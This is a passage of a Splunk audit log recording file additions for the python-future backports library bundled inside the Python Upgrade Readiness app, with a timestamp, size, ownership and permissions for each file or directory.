modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.104, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/mime/image.py", isdir=0, size=1907, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.099, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/mime/base.py", isdir=0, size=875, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.095, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/mime/audio.py", isdir=0, size=2815, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.091, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/mime/application.py", isdir=0, size=1401, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.086, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/mime/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.082, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/utils.py", isdir=0, size=14270, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.076, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/quoprimime.py", isdir=0, size=10923, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.072, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/policy.py", isdir=0, size=8823, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.068, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/parser.py", isdir=0, size=5312, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.064, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/mime", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.060, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/message.py", isdir=0, size=35225, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.056, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/iterators.py", isdir=0, size=2348, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.052, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/headerregistry.py", isdir=0, size=20637, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.047, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/header.py", isdir=0, size=24448, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.042, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/generator.py", isdir=0, size=19520, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.035, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/feedparser.py", isdir=0, size=22736, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.028, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/errors.py", isdir=0, size=3680, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.022, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/encoders.py", isdir=0, size=2800, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.014, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/charset.py", isdir=0, size=17439, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.008, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/base64mime.py", isdir=0, size=3729, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.002, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/_policybase.py", isdir=0, size=14647, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.998, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/_parseaddr.py", isdir=0, size=17389, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.992, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/_header_value_parser.py", isdir=0, size=104692, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.988, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/_encoded_words.py", isdir=0, size=8443, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.983, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/__init__.py", isdir=0, size=2269, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.777, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/xmlrpc", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.773, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/urllib", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.769, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/total_ordering.py", isdir=0, size=1929, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.763, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/test", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.758, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/socketserver.py", isdir=0, size=24286, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.754, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/socket.py", isdir=0, size=15663, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.749, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/misc.py", isdir=0, size=32602, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.745, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/http", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.741, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/html", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.737, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.734, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/datetime.py", isdir=0, size=75552, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.730, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/_markupbase.py", isdir=0, size=16215, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.727, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/__init__.py", isdir=0, size=530, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.623, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/tests/base.py", isdir=0, size=19706, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.619, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/tests/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.515, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/builtins/newsuper.py", isdir=0, size=4146, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.510, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/builtins/newround.py", isdir=0, size=3096, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.504, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/builtins/newnext.py", isdir=0, size=2009, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.498, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/builtins/misc.py", isdir=0, size=4087, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.494, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/builtins/iterators.py", isdir=0, size=1396, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.488, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/builtins/disabled.py", isdir=0, size=2109, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.483, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/builtins/__init__.py", isdir=0, size=1664, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.476, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/utils/surrogateescape.py", isdir=0, size=6097, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.472, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/utils/__init__.py", isdir=0, size=20325, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.468, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/standard_library/__init__.py", isdir=0, size=27743, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.464, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/http/server.py", isdir=0, size=606, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.460, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/http/cookies.py", isdir=0, size=233, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.453, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/http/cookiejar.py", isdir=0, size=173, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.448, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/http/client.py", isdir=0, size=165, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.444, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/http/__init__.py", isdir=0, size=71, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.339, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/urllib/robotparser.py", isdir=0, size=179, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.336, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/urllib/response.py", isdir=0, size=342, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.332, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/urllib/request.py", isdir=0, size=3517, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.329, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/urllib/parse.py", isdir=0, size=1045, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.325, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/urllib/error.py", isdir=0, size=479, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.322, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/urllib/__init__.py", isdir=0, size=110, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.318, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/xmlrpc/server.py", isdir=0, size=143, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.313, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/xmlrpc/client.py", isdir=0, size=143, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.309, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/xmlrpc/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.205, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/test/support.py", isdir=0, size=259, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.201, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/test/__init__.py", isdir=0, size=110, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.196, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/dbm/ndbm.py", isdir=0, size=162, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.192, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/dbm/gnu.py", isdir=0, size=162, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.189, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/dbm/dumb.py", isdir=0, size=166, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.185, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/dbm/__init__.py", isdir=0, size=488, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.181, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/html/parser.py", isdir=0, size=167, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.177, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/html/entities.py", isdir=0, size=177, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.173, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/html/__init__.py", isdir=0, size=1016, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.069, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/tkinter/ttk.py", isdir=0, size=302, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.065, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/tkinter/tix.py", isdir=0, size=302, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.062, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/tkinter/simpledialog.py", isdir=0, size=329, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.057, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/tkinter/scrolledtext.py", isdir=0, size=329, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.051, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/tkinter/messagebox.py", isdir=0, size=327, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.047, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/tkinter/font.py", isdir=0, size=309, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.043, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/tkinter/filedialog.py", isdir=0, size=323, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.039, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/tkinter/dnd.py", isdir=0, size=306, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.034, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/tkinter/dialog.py", isdir=0, size=311, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.029, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/tkinter/constants.py", isdir=0, size=324, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.025, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/tkinter/commondialog.py", isdir=0, size=333, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.021, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/tkinter/colorchooser.py", isdir=0, size=333, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:42.016, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/tkinter/__init__.py", isdir=0, size=620, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.911, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/xmlrpc", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.907, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/winreg.py", isdir=0, size=163, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.903, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/urllib", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.899, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/tkinter", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.893, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/test", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.889, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/sys.py", isdir=0, size=132, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.882, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/subprocess.py", isdir=0, size=251, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.878, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/socketserver.py", isdir=0, size=174, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.874, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/reprlib.py", isdir=0, size=161, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.870, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/queue.py", isdir=0, size=160, gid=41812, 